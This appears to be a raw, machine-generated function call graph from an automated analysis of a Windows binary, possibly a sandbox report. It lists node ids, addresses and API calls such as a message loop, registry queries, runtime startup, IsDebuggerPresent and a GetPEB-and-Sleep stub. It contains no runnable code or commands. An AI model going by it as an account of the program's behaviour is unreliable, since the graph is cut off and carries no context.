calls 95954->95955 95955->95957 95956 fcbb88 95959 fcba68 95956->95959 95960 fa1c9d _free 47 API calls 95956->95960 95957->95956 95958 fa1c9d _free 47 API calls 95957->95958 95958->95956 95959->95683 95959->95684 95960->95959 95962 f8bd3f 95961->95962 95965 f8bd5a 95961->95965 95963 f8bdfa 48 API calls 95962->95963 95964 f8bd47 CharUpperBuffW 95963->95964 95964->95965 95965->95034 95967 f82b8b 95966->95967 95968 ff436a 95966->95968 95969 f9f4ea 48 API calls 95967->95969 95970 f82b92 95969->95970 95971 f82bb3 95970->95971 96062 f82bce 48 API calls 95970->96062 95971->95055 95974 f8e8f6 95973->95974 96031 f8e906 Mailbox 95973->96031 95975 f8ed52 95974->95975 95974->96031 96146 f9e3cd 335 API calls 95975->96146 95976 fccc5c 86 API calls 95976->96031 95978 f8ebdd 95978->95092 95980 f8ed63 95980->95978 95981 f8ed70 95980->95981 96148 f9e312 335 API calls Mailbox 95981->96148 95982 f8e94c PeekMessageW 95982->96031 95984 f8ed77 LockWindowUpdate DestroyWindow GetMessageW 95984->95978 95987 f8eda9 95984->95987 95985 ff526e Sleep 95985->96031 95989 ff59ef TranslateMessage DispatchMessageW GetMessageW 95987->95989 95988 f8ebc7 95988->95978 96147 f82ff6 16 API calls 95988->96147 95989->95989 95991 ff5a1f 95989->95991 95991->95978 95992 f8ed21 PeekMessageW 95992->96031 95993 f8ebf7 timeGetTime 95993->96031 95995 f9f4ea 48 API calls 95995->96031 95996 f86eed 48 API calls 95996->96031 95997 f8ed3a TranslateMessage DispatchMessageW 95997->95992 95998 ff5557 WaitForSingleObject 95999 ff5574 GetExitCodeProcess CloseHandle 95998->95999 95998->96031 95999->96031 96000 f8d7f7 48 API calls 96029 ff5429 Mailbox 96000->96029 96001 ff588f Sleep 96001->96029 96002 f8edae timeGetTime 96149 f81caa 49 API calls 96002->96149 96003 ff5733 Sleep 96003->96029 96007 ff5926 GetExitCodeProcess 96012 ff593c WaitForSingleObject 96007->96012 96013 ff5952 CloseHandle 96007->96013 96009 f82aae 311 API calls 96009->96031 96010 f9dc38 timeGetTime 96010->96029 96011 ff5445 Sleep 96011->96031 96012->96013 96012->96031 96013->96029 96014 ff5432 Sleep 96014->96011 96015 fe8c4b 108 API calls 96015->96029 96016 f82c79 107 API calls 96016->96029 96018 ff59ae Sleep 96018->96031 96019 f81caa 49 API calls 96019->96031 96022 f8ce19 48 API calls 96022->96029 96024 f8fe30 311 API calls 96024->96031 96025 f8d6e9 55 API calls 96025->96029 96026 f945e0 311 API calls 96026->96031 96027 f93200 311 API calls 96027->96031 96029->96000 96029->96007 96029->96010 96029->96011 96029->96014 96029->96015 96029->96016 96029->96018 96029->96022 96029->96025 96029->96031 96151 fc4cbe 49 API calls Mailbox 96029->96151 96152 f81caa 49 API calls 96029->96152 96153 f82aae 335 API calls 96029->96153 96154 fdccb2 50 API calls 96029->96154 96155 fc7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96029->96155 96156 fc6532 63 API calls 3 library calls 96029->96156 96031->95976 96031->95982 96031->95985 96031->95988 96031->95992 96031->95993 96031->95995 96031->95996 96031->95997 96031->95998 96031->96001 96031->96002 96031->96003 96031->96009 96031->96011 96031->96019 96031->96024 96031->96026 96031->96027 96031->96029 96032 f8ce19 48 API calls 96031->96032 96033 f8d6e9 55 API calls 96031->96033 96063 f8ef00 96031->96063 96070 f8f110 96031->96070 96135 f9e244 96031->96135 96140 f9dc5f 96031->96140 96145 f8eed0 335 API calls Mailbox 96031->96145 96150 fe8d23 48 API calls 96031->96150 96032->96031 96033->96031 96034->95042 96035->95096 96036->95092 96037->95092 96038->95092 96039->95103 96040->95042 96041->95096 96042->95085 96043->95085 96044->95041 96045->95096 96046->95068 96047->95096 96048->95096 96049->95096 96050->95092 96051->95092 96052->95092 96053->95092 96055 f8d6f4 96054->96055 96057 f8d71b 96055->96057 96180 f8d764 55 API calls 96055->96180 96057->95067 96058->95096 96059->95088 96060->95097 96061->95096 96062->95971 96064 f8ef1d 96063->96064 96065 f8ef2f 96063->96065 96157 f8e3b0 335 API calls 2 library calls 96064->96157 96158 fccc5c 86 API calls 4 library calls 96065->96158 96068 f8ef26 96068->96031 96069 ff86f9 96069->96069 96071 f8f130 96070->96071 96073 f8fe30 335 API calls 96071->96073 96077 f8f199 96071->96077 96072 f8f3dd 96076 ff87c8 96072->96076 96087 f8f3f2 96072->96087 96118 f8f431 Mailbox 96072->96118 96075 ff8728 96073->96075 96074 f8f595 96081 f8d7f7 48 API calls 96074->96081 96074->96118 96075->96077 96160 fccc5c 86 API calls 4 library calls 96075->96160 96163 fccc5c 86 API calls 4 library calls 96076->96163 96077->96072 96077->96074 96083 f8d7f7 48 API calls 96077->96083 96120 f8f229 96077->96120 96078 f8fe30 335 API calls 96078->96118 96082 ff87a3 96081->96082 96162 fa0f0a 52 API calls __cinit 96082->96162 96085 ff8772 96083->96085 96084 ff8b1b 96101 ff8bcf 96084->96101 96102 ff8b2c 96084->96102 96161 fa0f0a 52 API calls __cinit 96085->96161 96097 f8f418 96087->96097 96164 fc9af1 48 API calls 96087->96164 96088 f8f770 96095 ff8a45 96088->96095 96112 f8f77a 96088->96112 96090 f8d6e9 55 API calls 96090->96118 96092 f8fe30 335 API calls 96114 f8f6aa 96092->96114 96093 fccc5c 86 API calls 96093->96118 96094 ff8b7e 96173 fde40a 335 API calls Mailbox 96094->96173 96170 f9c1af 48 API calls 96095->96170 96096 ff8c53 96178 fccc5c 86 API calls 4 library calls 96096->96178 96097->96084 96097->96114 96097->96118 96098 ff8810 96165 fdeef8 335 API calls 96098->96165 96175 fccc5c 86 API calls 4 library calls 96101->96175 96172 fdf5ee 335 API calls 96102->96172 96103 ff8beb 96176 fdbdbd 335 API calls Mailbox 96103->96176 96108 f91b90 48 API calls 96108->96118 96110 f91b90 48 API calls 96110->96118 96112->96110 96113 ff8c00 96134 f8f537 Mailbox 96113->96134 96177 fccc5c 86 API calls 4 library calls 96113->96177 96114->96088 96114->96092 96115 f8fce0 96114->96115 96114->96118 96114->96134 96115->96134 96174 fccc5c 86 API calls 4 library calls 96115->96174 96116 ff8823 96116->96097 96119 ff884b 96116->96119 96118->96078 96118->96090 96118->96093 96118->96094 96118->96096 96118->96103 96118->96108 96118->96115 96118->96134 96159 f8dd47 48 API calls _memcpy_s 96118->96159 96171 fb97ed InterlockedDecrement 96118->96171 96179 f9c1af 48 API calls 96118->96179 96166 fdccdc 48 API calls 96119->96166 96120->96072 96120->96074 96120->96097 96120->96118 96124 ff8857 96126 ff8865 96124->96126 96127 ff88aa 96124->96127 96167 fc9b72 48 API calls 96126->96167 96130 ff88a0 Mailbox 96127->96130 96168 fca69d 48 API calls 96127->96168 96128 f8fe30 335 API calls 96128->96134 96130->96128 96132 ff88e7 96169 f8bc74 48 API calls 96132->96169 96134->96031 96136 f9e253 96135->96136 96138 ffdf42 96135->96138 96136->96031 96137 ffdf77 96138->96137 96139 ffdf59 TranslateAcceleratorW 96138->96139 96139->96136 96141 f9dca3 96140->96141 96142 f9dc71 96140->96142 96141->96031 96142->96141 96143 f9dc96 IsDialogMessageW 96142->96143 96144 ffdd1d GetClassLongW 96142->96144 96143->96141 96143->96142 96144->96142 96144->96143 96145->96031 96146->95988 96147->95980 96148->95984 96149->96031 96150->96031 96151->96029 96152->96029 96153->96029 96154->96029 96155->96029 96156->96029 96157->96068 96158->96069 96159->96118 96160->96077 96161->96120 96162->96118 96163->96134 96164->96098 96165->96116 96166->96124 96167->96130 96168->96132 96169->96130 96170->96118 96171->96118 96172->96118 96173->96115 96174->96134 96175->96134 96176->96113 96177->96134 96178->96134 96179->96118 96180->96057 96181->94756 96182 1a4c190 96196 1a49de0 96182->96196 96184 1a4c254 96199 1a4c080 96184->96199 96202 1a4d280 GetPEB 96196->96202 96198 1a4a46b 96198->96184 96200 1a4c089 Sleep 96199->96200 96201 1a4c097 96200->96201 96203 1a4d2aa 96202->96203 96203->96198 96204 ff19cb 96209 f82322 96204->96209 96206 ff19d1 96242 fa0f0a 52 API calls __cinit 96206->96242 96208 ff19db 96210 f82344 96209->96210 96243 f826df 96210->96243 96215 f8d7f7 48 API calls 96216 f82384 96215->96216 96217 f8d7f7 48 API calls 96216->96217 96218 f8238e 96217->96218 96219 f8d7f7 48 API calls 96218->96219 96220 f82398 96219->96220 96221 f8d7f7 48 API calls 96220->96221 96222 f823de 96221->96222 96223 f8d7f7 48 API calls 96222->96223 96224 f824c1 96223->96224 96251 f8263f 96224->96251 96228 f824f1 96229 f8d7f7 48 API calls 96228->96229 96230 f824fb 96229->96230 96280 f82745 96230->96280 96232 f82546 96233 f82556 GetStdHandle 96232->96233 96234 ff501d 96233->96234 96235 f825b1 96233->96235 96234->96235 96237 ff5026 96234->96237 96236 f825b7 CoInitialize 96235->96236 96236->96206 96287 fc92d4 53 API calls 96237->96287 96239 ff502d 96288 fc99f9 CreateThread 96239->96288 96241 ff5039 CloseHandle 96241->96236 96242->96208 96289 f82854 96243->96289 96246 f86a63 48 API calls 96247 f8234a 96246->96247 96248 f8272e 96247->96248 96303 f827ec 6 API calls 96248->96303 96250 f8237a 96250->96215 96252 f8d7f7 48 API calls 96251->96252 96253 f8264f 96252->96253 96254 f8d7f7 48 API calls 96253->96254 96255 f82657 96254->96255 96304 f826a7 96255->96304 96258 f826a7 48 API calls 96259 f82667 96258->96259 96260 f8d7f7 48 API calls 96259->96260 96261 f82672 96260->96261 96262 f9f4ea 48 API calls 96261->96262 96263 f824cb 96262->96263 96264 f822a4 96263->96264 96265 f822b2 96264->96265 96266 f8d7f7 48 API calls 96265->96266 96267 f822bd 96266->96267 96268 f8d7f7 48 API calls 96267->96268 96269 f822c8 96268->96269 96270 f8d7f7 48 API calls 96269->96270 96271 f822d3 96270->96271 96272 f8d7f7 48 API calls 96271->96272 96273 f822de 96272->96273 96274 f826a7 48 API calls 96273->96274 96275 f822e9 96274->96275 96276 f9f4ea 48 API calls 96275->96276 96277 f822f0 96276->96277 96278 f822f9 RegisterWindowMessageW 96277->96278 96279 ff1fe7 96277->96279 96278->96228 96281 ff5f4d 96280->96281 96282 f82755 96280->96282 96309 fcc942 50 API calls 96281->96309 96284 f9f4ea 48 API calls 96282->96284 96286 f8275d 96284->96286 96285 ff5f58 96286->96232 96287->96239 96288->96241 96310 fc99df 54 API calls 96288->96310 96296 f82870 96289->96296 96292 f82870 48 API calls 96293 f82864 96292->96293 96294 f8d7f7 48 API calls 96293->96294 96295 f82716 96294->96295 96295->96246 96297 f8d7f7 48 API calls 96296->96297 96298 f8287b 96297->96298 96299 f8d7f7 48 API calls 96298->96299 96300 f82883 96299->96300 96301 f8d7f7 48 API calls 96300->96301 96302 f8285c 96301->96302 96302->96292 96303->96250 96305 f8d7f7 48 API calls 96304->96305 96306 f826b0 96305->96306 96307 f8d7f7 48 API calls 96306->96307 96308 f8265f 96307->96308 96308->96258 96309->96285 96311 ff197b 96316 f9dd94 96311->96316 96315 ff198a 96317 f9f4ea 48 API calls 96316->96317 96319 f9dd9c 96317->96319 96318 f9ddb0 96323 fa0f0a 52 API calls __cinit 96318->96323 96319->96318 96324 f9df3d 96319->96324 96323->96315 96325 f9dda8 96324->96325 96326 f9df46 96324->96326 96328 f9ddc0 96325->96328 96356 fa0f0a 52 API calls __cinit 96326->96356 96329 f8d7f7 48 API calls 96328->96329 96330 f9ddd7 GetVersionExW 96329->96330 96331 f86a63 48 API calls 96330->96331 96332 f9de1a 96331->96332 96357 f9dfb4 96332->96357 96335 f86571 48 API calls 96337 f9de2e 96335->96337 96339 ff24c8 96337->96339 96361 f9df77 96337->96361 96340 f9dea4 GetCurrentProcess 96370 f9df5f LoadLibraryA GetProcAddress 96340->96370 96342 f9df31 GetSystemInfo 96345 f9df0e 96342->96345 96343 f9dee3 96364 f9e00c 96343->96364 96344 f9debb 96344->96342 96344->96343 96347 f9df1c FreeLibrary 96345->96347 96348 f9df21 96345->96348 96347->96348 96348->96318 96350 f9df29 GetSystemInfo 96353 f9df03 96350->96353 96351 f9def9 96367 f9dff4 96351->96367 96353->96345 96355 f9df09 FreeLibrary 96353->96355 96355->96345 96356->96325 96358 f9dfbd 96357->96358 96359 f8b18b 48 API calls 96358->96359 96360 f9de22 96359->96360 96360->96335 96371 f9df89 96361->96371 96375 f9e01e 96364->96375 96368 f9e00c 2 API calls 96367->96368 96369 f9df01 GetNativeSystemInfo 96368->96369 96369->96353 96370->96344 96372 f9dea0 96371->96372 96373 f9df92 LoadLibraryA 96371->96373 96372->96340 96372->96344 96373->96372 96374 f9dfa3 GetProcAddress 96373->96374 96374->96372 96376 f9def1 96375->96376 96377 f9e027 LoadLibraryA 96375->96377 96376->96350 96376->96351 96377->96376 96378 f9e038 GetProcAddress 96377->96378 96378->96376 96379 ff19ba 96384 f9c75a 96379->96384 96383 ff19c9 96385 f8d7f7 48 API calls 96384->96385 96386 f9c7c8 96385->96386 96392 f9d26c 96386->96392 96389 f9c865 96390 f9c881 96389->96390 96395 f9d1fa 48 API calls _memcpy_s 96389->96395 96391 fa0f0a 52 API calls __cinit 96390->96391 96391->96383 96396 f9d298 96392->96396 96395->96389 96397 f9d28b 96396->96397 96398 f9d2a5 96396->96398 96397->96389 96398->96397 96399 f9d2ac RegOpenKeyExW 96398->96399 96399->96397 96400 f9d2c6 RegQueryValueExW 96399->96400 96401 f9d2fc RegCloseKey 96400->96401 96402 f9d2e7 96400->96402 96401->96397 96402->96401 96403 ff8eb8 96407 fca635 96403->96407 96405 ff8ec3 96406 fca635 84 API calls 96405->96406 96406->96405 96408 fca642 96407->96408 96414 fca66f 96407->96414 96409 fca671 96408->96409 96410 fca676 96408->96410 96408->96414 96416 fca669 96408->96416 96419 f9ec4e 81 API calls 96409->96419 96412 f8936c 81 API calls 96410->96412 96413 fca67d 96412->96413 96415 f8510d 48 API calls 96413->96415 96414->96405 96415->96414 96418 f94525 61 API calls _memcpy_s 96416->96418 96418->96414 96419->96410 96420 fa5dfd 96421 fa5e09 __fcloseall 96420->96421 96457 fa7eeb GetStartupInfoW 96421->96457 96423 fa5e0e 96459 fa9ca7 GetProcessHeap 96423->96459 96425 fa5e66 96426 fa5e71 96425->96426 96544 fa5f4d 47 API calls 3 library calls 96425->96544 96460 fa7b47 96426->96460 96429 fa5e77 96430 fa5e82 __RTC_Initialize 96429->96430 96545 fa5f4d 47 API calls 3 library calls 96429->96545 96481 faacb3 96430->96481 96433 fa5e91 96434 fa5e9d GetCommandLineW 96433->96434 96546 fa5f4d 47 API calls 3 library calls 96433->96546 96500 fb2e7d GetEnvironmentStringsW 96434->96500 96437 fa5e9c 96437->96434 96441 fa5ec2 96513 fb2cb4 96441->96513 96444 fa5ec8 96445 fa5ed3 96444->96445 96548 fa115b 47 API calls 3 library calls 96444->96548 96527 fa1195 96445->96527 96448 fa5edb 96449 fa5ee6 __wwincmdln 96448->96449 96549 fa115b 47 API calls 3 library calls 96448->96549 96531 f83a0f 96449->96531 96452 fa5efa 96453 fa5f09 96452->96453 96550 fa13f1 47 API calls _doexit 96452->96550 96551 fa1186 47 API calls _doexit 96453->96551 96456 fa5f0e __fcloseall 96458 fa7f01 96457->96458 96458->96423 96459->96425 96552 fa123a 30 API calls 2 library calls 96460->96552 96462 fa7b4c 96553 fa7e23 InitializeCriticalSectionAndSpinCount 96462->96553 96464 fa7b51 96465 fa7b55 96464->96465 96555 fa7e6d TlsAlloc 96464->96555 96554 fa7bbd 50 API calls 2 library calls 96465->96554 96468 fa7b67 96468->96465 96470 fa7b72 96468->96470 96469 fa7b5a 96469->96429 96556 fa6986 96470->96556 96473 fa7bb4 96564 fa7bbd 50 API calls 2 library calls 96473->96564 96476 fa7b93 96476->96473 96478 fa7b99 96476->96478 96477 fa7bb9 96477->96429 96563 fa7a94 47 API calls 4 library calls 96478->96563 96480 fa7ba1 GetCurrentThreadId 96480->96429 96482 faacbf __fcloseall 96481->96482 96483 fa7cf4 __lock 47 API calls 96482->96483 96484 faacc6 96483->96484 96485 fa6986 __calloc_crt 47 API calls 96484->96485 96487 faacd7 96485->96487 96486 faad42 GetStartupInfoW 96489 faad57 96486->96489 96490 faae80 96486->96490 96487->96486 96488 faace2 __fcloseall @_EH4_CallFilterFunc@8 96487->96488 96488->96433 96489->96490 96494 fa6986 __calloc_crt 47 API calls 96489->96494 96496 faada5 96489->96496 96491 faaf44 96490->96491 96493 faaec9 GetStdHandle 96490->96493 96495 faaedb GetFileType 96490->96495 96497 faaf08 InitializeCriticalSectionAndSpinCount 96490->96497 96573 faaf58 LeaveCriticalSection _doexit 96491->96573 96493->96490 96494->96489 96495->96490 96496->96490 96498 faadd7 GetFileType 96496->96498 96499 faade5 InitializeCriticalSectionAndSpinCount 96496->96499 96497->96490 96498->96496 96498->96499 96499->96496 96501 fb2e8e 96500->96501 96502 fa5ead 96500->96502 96574 fa69d0 47 API calls __malloc_crt 96501->96574 96507 fb2a7b GetModuleFileNameW 96502->96507 96505 fb2eca FreeEnvironmentStringsW 96505->96502 96506 fb2eb4 _memcpy_s 96506->96505 96508 fb2aaf _wparse_cmdline 96507->96508 96509 fa5eb7 96508->96509 96510 fb2ae9 96508->96510 96509->96441 96547 fa115b 47 API calls 3 library calls 96509->96547 96575 fa69d0 47 API calls __malloc_crt 96510->96575 96512 fb2aef _wparse_cmdline 96512->96509 96514 fb2cc5 96513->96514 96515 fb2ccd __NMSG_WRITE 96513->96515 96514->96444 96516 fa6986 __calloc_crt 47 API calls 96515->96516 96523 fb2cf6 __NMSG_WRITE 96516->96523 96517 fb2d4d 96518 fa1c9d _free 47 API calls 96517->96518 96518->96514 96519 fa6986 __calloc_crt 47 API calls 96519->96523 96520 fb2d72 96522 fa1c9d _free 47 API calls 96520->96522 96522->96514 96523->96514 96523->96517 96523->96519 96523->96520 96524 fb2d89 96523->96524 96576 fb2567 47 API calls strtoxl 96523->96576 96577 fa6e20 IsProcessorFeaturePresent 96524->96577 96526 fb2d95 96526->96444 96528 fa11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 96527->96528 96530 fa11e0 __IsNonwritableInCurrentImage 96528->96530 96592 fa0f0a 52 API calls __cinit 96528->96592 96530->96448 96532 ff1ebf 96531->96532 96533 f83a29 96531->96533 96534 f83a63 IsThemeActive 96533->96534 96593 fa1405 96534->96593 96538 f83a8f 96605 f83adb SystemParametersInfoW SystemParametersInfoW 96538->96605 96540 f83a9b 96606 f83d19 96540->96606 96542 f83aa3 SystemParametersInfoW 96543 f83ac8 96542->96543 96543->96452 96544->96426 96545->96430 96546->96437 96550->96453 96551->96456 96552->96462 96553->96464 96554->96469 96555->96468 96559 fa698d 96556->96559 96558 fa69ca 96558->96473 96562 fa7ec9 TlsSetValue 96558->96562 96559->96558 96560 fa69ab Sleep 96559->96560 96565 fb30aa 96559->96565 96561 fa69c2 96560->96561 96561->96558 96561->96559 96562->96476 96563->96480 96564->96477 96566 fb30b5 96565->96566 96571 fb30d0 __calloc_impl 96565->96571 96567 fb30c1 96566->96567 96566->96571 96572 fa7c0e 47 API calls __getptd_noexit 96567->96572 96569 fb30e0 HeapAlloc 96570 fb30c6 96569->96570 96569->96571 96570->96559 96571->96569 96571->96570 96572->96570 96573->96488 96574->96506 96575->96512 96576->96523 96578 fa6e2b 96577->96578 96583 fa6cb5 96578->96583 96582 fa6e46 96582->96526 96584 fa6ccf _memset ___raise_securityfailure 96583->96584 96585 fa6cef IsDebuggerPresent 96584->96585 96591 fa81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 96585->96591 96587 faa70c __cftog_l 6 API calls 96589 fa6dd6 96587->96589 96588 fa6db3 ___raise_securityfailure 96588->96587 96590 fa8197 GetCurrentProcess TerminateProcess 96589->96590 96590->96582 96591->96588 96592->96530 96594 fa7cf4 __lock 47 API calls 96593->96594 96595 fa1410 96594->96595 96658 fa7e58 LeaveCriticalSection 96595->96658 96597 f83a88 96598 fa146d 96597->96598 96599 fa1491 96598->96599 96600 fa1477 96598->96600 96599->96538 96600->96599 96659 fa7c0e 47 API calls __getptd_noexit 96600->96659 96602 fa1481 96660 fa6e10 8 API calls strtoxl 96602->96660 96604 fa148c 96604->96538 96605->96540 96607 f83d26 __ftell_nolock 96606->96607 96608 f8d7f7 48 API calls 96607->96608 96609 f83d31 GetCurrentDirectoryW 96608->96609 96661 f861ca 96609->96661 96611 f83d57 IsDebuggerPresent 96612 f83d65 96611->96612 96613 ff1cc1 MessageBoxA 96611->96613 96615 ff1cd9 96612->96615 96616 f83d82 96612->96616 96645 f83e3a 96612->96645 96613->96615 96614 f83e41 SetCurrentDirectoryW 96619 f83e4e Mailbox 96614->96619 96786 f9c682 48 API calls 96615->96786 96735 f840e5 96616->96735 96619->96542 96620 ff1ce9 96625 ff1cff SetCurrentDirectoryW 96620->96625 96625->96619 96645->96614 96658->96597 96659->96602 96660->96604 96788 f9e99b 96661->96788 96665 f861eb 96666 f85374 50 API calls 96665->96666 96667 f861ff 96666->96667 96668 f8ce19 48 API calls 96667->96668 96669 f8620c 96668->96669 96805 f839db 96669->96805 96671 f86216 Mailbox 96672 f86eed 48 API calls 96671->96672 96673 f8622b 96672->96673 96817 f89048 96673->96817 96676 f8ce19 48 API calls 96677 f86244 96676->96677 96678 f8d6e9 55 API calls 96677->96678 96679 f86254 Mailbox 96678->96679 96680 f8ce19 48 API calls 96679->96680 96681 f8627c 96680->96681 96682 f8d6e9 55 API calls 96681->96682 96683 f8628f Mailbox 96682->96683 96684 f8ce19 48 API calls 96683->96684 96685 f862a0 96684->96685 96686 f8d645 53 API calls 96685->96686 96687 f862b2 Mailbox 96686->96687 96688 f8d7f7 48 API calls 96687->96688 96689 f862c5 96688->96689 96820 f863fc 96689->96820 96693 f862df 96694 f862e9 96693->96694 96695 ff1c08 96693->96695 96696 fa0fa7 _W_store_winword 59 API calls 96694->96696 96697 f863fc 48 API calls 96695->96697 96698 f862f4 96696->96698 96699 ff1c1c 96697->96699 96698->96699 96700 f862fe 96698->96700 96701 f863fc 48 API calls 96699->96701 96702 fa0fa7 _W_store_winword 59 API calls 96700->96702 96703 ff1c38 96701->96703 96704 f86309 96702->96704 96706 f85374 50 API calls 96703->96706 96704->96703 96705 f86313 96704->96705 96707 fa0fa7 _W_store_winword 59 API calls 96705->96707 96708 ff1c5d 96706->96708 96709 f8631e 96707->96709 96710 f863fc 48 API calls 96708->96710 96711 f8635f 96709->96711 96713 ff1c86 96709->96713 96717 f863fc 48 API calls 96709->96717 96714 ff1c69 96710->96714 96712 f8636c 96711->96712 96711->96713 96719 f9c050 48 API calls 96712->96719 96715 f86eed 48 API calls 96713->96715 96716 f86eed 48 API calls 96714->96716 96718 ff1ca8 96715->96718 96720 ff1c77 96716->96720 96721 f86342 96717->96721 96723 f863fc 48 API calls 96718->96723 96724 f86384 96719->96724 96725 f863fc 48 API calls 96720->96725 96722 f86eed 48 API calls 96721->96722 96726 f86350 96722->96726 96727 ff1cb5 96723->96727 96728 f91b90 48 API calls 96724->96728 96725->96713 96729 f863fc 48 API calls 96726->96729 96727->96727 96732 f86394 96728->96732 96729->96711 96730 f91b90 48 API calls 96730->96732 96732->96730 96733 f863fc 48 API calls 96732->96733 96734 f863d6 Mailbox 96732->96734 96836 f86b68 48 API calls 96732->96836 96733->96732 96734->96611 96736 f840f2 __ftell_nolock 96735->96736 96737 ff370e _memset 96736->96737 96738 f8410b 96736->96738 96741 ff372a GetOpenFileNameW 96737->96741 96739 f8660f 49 API calls 96738->96739 96740 f84114 96739->96740 96878 f840a7 96740->96878 96742 ff3779 96741->96742 96744 f86a63 48 API calls 96742->96744 96746 ff378e 96744->96746 96746->96746 96786->96620 96789 f8d7f7 48 API calls 96788->96789 96790 f861db 96789->96790 96791 f86009 96790->96791 96792 f86016 __ftell_nolock 96791->96792 96793 f86a63 48 API calls 96792->96793 96798 f8617c Mailbox 96792->96798 96794 f86048 96793->96794 96803 f8607e Mailbox 96794->96803 96837 f861a6 96794->96837 96796 f8614f 96797 f8ce19 48 API calls 96796->96797 96796->96798 96800 f86170 96797->96800 96798->96665 96799 f8ce19 48 API calls 96799->96803 96801 f864cf 48 API calls 96800->96801 96801->96798 96802 f864cf 48 API calls 96802->96803 96803->96796 96803->96798 96803->96799 96803->96802 96804 f861a6 48 API calls 96803->96804 96804->96803 96806 f841a9 136 API calls 96805->96806 96807 f839fe 96806->96807 96808 f83a06 96807->96808 96840 fcc396 96807->96840 96808->96671 96811 ff2ff0 96812 fa1c9d _free 47 API calls 96811->96812 96814 ff2ffd 96812->96814 96813 f84252 84 API calls 96813->96811 96815 f84252 84 API calls 96814->96815 96816 ff3006 96815->96816 96816->96816 96818 f9f4ea 48 API calls 96817->96818 96819 f86237 96818->96819 96819->96676 96821 f8641f 96820->96821 96822 f86406 96820->96822 96824 f86a63 48 API calls 96821->96824 96823 f86eed 48 API calls 96822->96823 96825 f862d1 96823->96825 96824->96825 96826 fa0fa7 96825->96826 96827 fa1028 96826->96827 96828 fa0fb3 96826->96828 96877 fa103a 59 API calls 3 library calls 96827->96877 96834 fa0fd8 96828->96834 96875 fa7c0e 47 API calls __getptd_noexit 96828->96875 96831 fa1035 96831->96693 96832 fa0fbf 96876 fa6e10 8 API calls strtoxl 96832->96876 96834->96693 96835 fa0fca 96835->96693 96836->96732 96838 f8bdfa 48 API calls 96837->96838 96839 f861b1 96838->96839 96839->96794 96841 f84517 83 API calls 96840->96841 96842 fcc405 96841->96842 96843 fcc56d 94 API calls 96842->96843 96844 fcc417 96843->96844 96845 f844ed 64 API calls 96844->96845 96873 fcc41b 96844->96873 96846 fcc432 96845->96846 96847 f844ed 64 API calls 96846->96847 96848 fcc442 96847->96848 96849 f844ed 64 API calls 96848->96849 96850 fcc45d 96849->96850 96851 f844ed 64 API calls 96850->96851 96852 fcc478 96851->96852 96853 f84517 83 API calls 96852->96853 96854 fcc48f 96853->96854 96855 fa395c __malloc_crt 47 API calls 96854->96855 96856 fcc496 96855->96856 96857 fa395c __malloc_crt 47 API calls 96856->96857 96858 fcc4a0 96857->96858 96859 f844ed 64 API calls 96858->96859 96860 fcc4b4 96859->96860 96861 fcbf5a GetSystemTimeAsFileTime 96860->96861 96862 fcc4c7 96861->96862 96863 fcc4dc 96862->96863 96864 fcc4f1 96862->96864 96867 fa1c9d _free 47 API calls 96863->96867 96865 fcc556 96864->96865 96866 fcc4f7 96864->96866 96870 fa1c9d _free 47 API calls 96865->96870 96869 fcb965 118 API calls 96866->96869 96868 fcc4e2 96867->96868 96871 fa1c9d _free 47 API calls 96868->96871 96872 fcc54e 96869->96872 96870->96873 96871->96873 96874 fa1c9d _free 47 API calls 96872->96874 96873->96811 96873->96813 96874->96873 96875->96832 96876->96835 96877->96831 96879 faf8a0 __ftell_nolock 96878->96879 96880 f840b4 GetLongPathNameW 96879->96880 96881 f86a63 48 API calls 96880->96881 96882 f840dc 96881->96882 96883 f849a0 96882->96883 96884 f8d7f7 48 API calls 96883->96884 96885 f849b2 96884->96885 96886 f8660f 49 API calls 96885->96886 96887 f849bd 96886->96887 96888 f849c8 96887->96888 96891 ff2e35 96887->96891 96890 f864cf 48 API calls 96888->96890 96894 ff2e4f 96891->96894 96936 f9d35e 60 API calls 96891->96936 96936->96891 97115 f8f030 97118 f93b70 97115->97118 97117 f8f03c 97119 f93bc8 97118->97119 97173 f942a5 97118->97173 97120 f93bef 97119->97120 97122 ff6fd1 97119->97122 97124 ff6f7e 97119->97124 97131 ff6f9b 97119->97131 97121 f9f4ea 48 API calls 97120->97121 97123 f93c18 97121->97123 97198 fdceca 335 API calls Mailbox 97122->97198 97126 f9f4ea 48 API calls 97123->97126 97124->97120 97127 ff6f87 97124->97127 97180 f93c2c _memcpy_s __NMSG_WRITE 97126->97180 97195 fdd552 335 API calls Mailbox 97127->97195 97128 ff6fbe 97197 fccc5c 86 API calls 4 library calls 97128->97197 97131->97128 97196 fdda0e 335 API calls 2 library calls 97131->97196 97132 f942f2 97217 fccc5c 86 API calls 4 library calls 97132->97217 97135 ff73b0 97135->97117 97136 ff7297 97206 fccc5c 86 API calls 4 library calls 97136->97206 97137 ff737a 97216 fccc5c 86 API calls 4 library calls 97137->97216 97141 f940df 97207 fccc5c 86 API calls 4 library calls 97141->97207 97143 ff707e 97199 fccc5c 86 API calls 4 library calls 97143->97199 97145 f9dce0 53 API calls 97145->97180 97146 f8d6e9 55 API calls 97146->97180 97149 f9f4ea 48 API calls 97149->97180 97150 f8d645 53 API calls 97150->97180 97153 ff72d2 97208 fccc5c 86 API calls 4 library calls 97153->97208 97155 ff7350 97214 fccc5c 86 API calls 4 library calls 97155->97214 97157 f8fe30 335 API calls 97157->97180 97158 ff7363 97215 fccc5c 86 API calls 4 library calls 97158->97215 97160 ff72e9 97209 fccc5c 86 API calls 4 library calls 97160->97209 97163 f86a63 48 API calls 97163->97180 97165 f9c050 48 API calls 97165->97180 97166 ff714c 97203 fdccdc 48 API calls 97166->97203 97167 f8d286 48 API calls 97167->97180 97169 f93f2b 97169->97117 97170 ff733f 97213 fccc5c 86 API calls 4 library calls 97170->97213 97210 fccc5c 86 API calls 4 library calls 97173->97210 97174 ff71a1 97205 f9c15c 48 API calls 97174->97205 97177 f9ee75 48 API calls 97177->97180 97178 f86eed 48 API calls 97178->97180 97180->97132 97180->97136 97180->97137 97180->97141 97180->97143 97180->97145 97180->97146 97180->97149 97180->97150 97180->97153 97180->97155 97180->97157 97180->97158 97180->97160 97180->97163 97180->97165 97180->97166 97180->97167 97180->97169 97180->97170 97180->97173 97180->97177 97180->97178 97181 ff71e1 97180->97181 97190 f8d9a0 53 API calls __cinit 97180->97190 97191 f8d83d 53 API calls 97180->97191 97192 f8cdb9 48 API calls 97180->97192 